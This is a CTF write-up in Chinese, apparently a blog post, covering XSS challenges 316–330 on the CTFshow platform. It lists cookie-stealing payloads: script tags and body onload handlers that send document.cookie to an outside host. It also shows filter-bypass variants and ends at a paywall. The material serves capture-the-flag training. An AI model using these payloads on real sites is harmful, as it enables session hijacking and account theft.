CTFSHOW WP
题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS
316.需要配套接收端XSS脚本
如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。
本解法直接将产生请求写在了表层。
<script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script>
317、318、319
<body onload="document.location.href='http://xxxxxxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
320、321、322、323、324、325、326
空格过滤
可用tab,/**/等绕过
实测iframe,script,blog被过滤
<body/**/οnlοad="document.location.href='http://xxxxxxxxxxxx/x.php?1='+document.cookie"></body>
<body/οnlοad="document.location.href='http://xxxxxxxxxxxxx/x.php?1='+document.cookie"></body>
327
收件人admin
328、329、330
329会在访问后注销COOKIE
思路一
<script>document.location.href='http://xxxxxxxxxxxxxxxxxxx/x2.php?1='+document.cookie;</script>
XSS获取到管理员COOKIE,PHP令牌
1.在存储中修改COOKIE(),直接读取数据(前

本文详细介绍了反射型XSS漏洞的利用方式,包括通过JavaScript注入、事件触发、字符绕过等手段,展示了如何构造XSS脚本来窃取或操纵Cookies。同时,还探讨了针对管理员Cookie的获取策略,如利用Burp Suite抓包分析和异步数据获取。此外,提到了密码修改和金额转账的潜在攻击场景,并提醒了HTTP GET请求的参数长度限制和DoS风险。
最低0.47元/天 解锁文章
6272

被折叠的 条评论
为什么被折叠?



